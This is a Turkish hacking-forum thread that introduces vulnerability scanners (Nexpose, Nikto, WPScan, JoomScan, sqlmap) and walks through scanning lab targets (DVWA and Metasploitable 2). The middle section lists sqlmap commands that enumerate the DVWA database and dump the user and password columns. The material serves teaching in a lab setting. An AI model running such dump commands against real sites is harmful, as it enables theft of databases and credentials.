Dev Konu / Açiklardan Faydalanma , Tool'lar / Luntox

'Hack Dökümanları' forumunda Luntox tarafından 8 Aralık 2017 tarihinde açılan konu

  1. Luntox Social Media Sosyal Medya Birimi

    Mesaj:
    332
    Beğeniler:
    329
    Cinsiyet:
    Erkek
    Powerhack Luntox ile Anlatmaya Devam ;)
    ____________________


    Açıkları taramak için Networkte OpenVAS,Nessus ve Nexpose gibi araçlar
    bulunmaktadır.Web açıklıkları için Nikto,Wpscan,Joomscan,Sqlmap,Netsparker
    ve Acunetix gibi tarama araçları bulunmaktadır.Bu dökümanda ben Nexpose ile
    açıklık tarayacağım.Nexpose Rapid7 tarafından geliştirilmekte ve Metasploit ile
    entegre olabilmektedir.Aşağıdaki linkten Nexpose’u indirip kurabilirsiniz.

    _______________

    Nikto
    Nikto, web server üzerinde bulunan güvenlik açığı tarama uygulamasıdır. Perl
    diliyle yazılmıştır ve ücretsizdir. Web sayfasında bulunabilecek XSS, SQL Injection
    benzeri güvenlik zaaflarını tespit eder.

    _______________

    WPScan
    WPScan WordPress sistemlerdeki açıkları taramaya yarayan bir güvenlik
    tarayıcısıdır. “Username Enumeration” “Password Bruteforce” “Wordpress
    Versiyon Enumeration” ve “Plugin,Theme Vulnerability Enumeration” özelliklerini
    kullanarak verilen site üzerinde açıklık taraması yapabilir.

    ________________

    JoomScan
    Joomscan aracı OWASP tarafından geliştirilmiş bir araçtır.
    Joom sitelerindeki güvenlik açıklarını tespit etmek amacıyla kullanılır.

    ________________

    Sqlmap pyhton dili yazılarak geliştirilmiş Sqli da çok başarılı bir araçtır.
    sqlmap -u "http://192.168.237.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    --cookie="security=low; PHPSESSID=8a412da14abe7c3a8885934fd9861bf5" --dbs

    •sqlmap -u "http://192.168.237.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    --cookie="security=low; PHPSESSID=8a412da14abe7c3a8885934fd9861bf5" -D dvwa --tables

    •sqlmap -u "http://192.168.237.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    --cookie="security=low; PHPSESSID=8a412da14abe7c3a8885934fd9861bf5" -D dvwa -T
    users --columns

    •sqlmap -u "http://192.168.237.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    --cookie="security=low; PHPSESSID=8a412da14abe7c3a8885934fd9861bf5" -D dvwa -T
    users -C user,password --dump

    _______________
    nexpose

    Program kurduktan sonra kurulumda oluşturduğunu username ve password giriyoruz.

    Giriş yaptıktan sonra Create diyip Site ye tıklayarak Info & Security kısmında
    tarama adını verip Assets kısmında hedef IP bilgisini girerek diğer adımlarıda
    sıra ile kontrol edip uygun tarama seçeneklerini seçip Save & Scan seçeneğine
    tıklıyoruz.Bu aşamada sunumun başında kurduğumuz güvenlik açıkları barındıran
    Metasploitable 2 adlı sanal makinayı açıyoruz ve onun IP adresini veriyoruz.Ve
    üzerinde bulunun açıkları Nexpose tarama sonuçlarında görebilirsiniz.

    //////////////

    Nexpose Taramasının nasıl yapılacağını ve sonuçlarını görmüş olduk.Portlar
    üzerinde çalışan servisler,databaseler,userlar barındırdığı açıklıklar ve bunların
    metasploit üzerinde bulunan modüllerine kadar tüm herşeyi getirdiğini
    gördük.Bundan sonrası hedef sistem üzerinde bulunan açıklıkları doğrulamak olan
    açıkları denemek ve sisteme sızmaya çalışmaktır.Bu kısımdan sonra artık Lab
    ortamımızda uygulamalı olarak sızma işlemi gerçekleştireceğiz bir sisteme
    sızmaktaki hedef o sistemde yetkili kullanıcı olup her şeye erişim sağlamaktır.Bu
    örnek makina linux olduğu için hedefimiz root olmaktır.

    Powerhack ! .
    Luntox ! .
     
    Luxury bunu beğendi.
  2. Luxury Sorunsuz Site Yetkilisi Administrator

    Mesaj:
    203
    Beğeniler:
    347
    Cinsiyet:
    Erkek
    Şehir:
    Moskova
    Güzel paylaşım :)
     
  3. Luntox Social Media Sosyal Medya Birimi

    Mesaj:
    332
    Beğeniler:
    329
    Cinsiyet:
    Erkek
    Tesekkurler .
     
Yükleniyor...

Bu Sayfayı Paylaş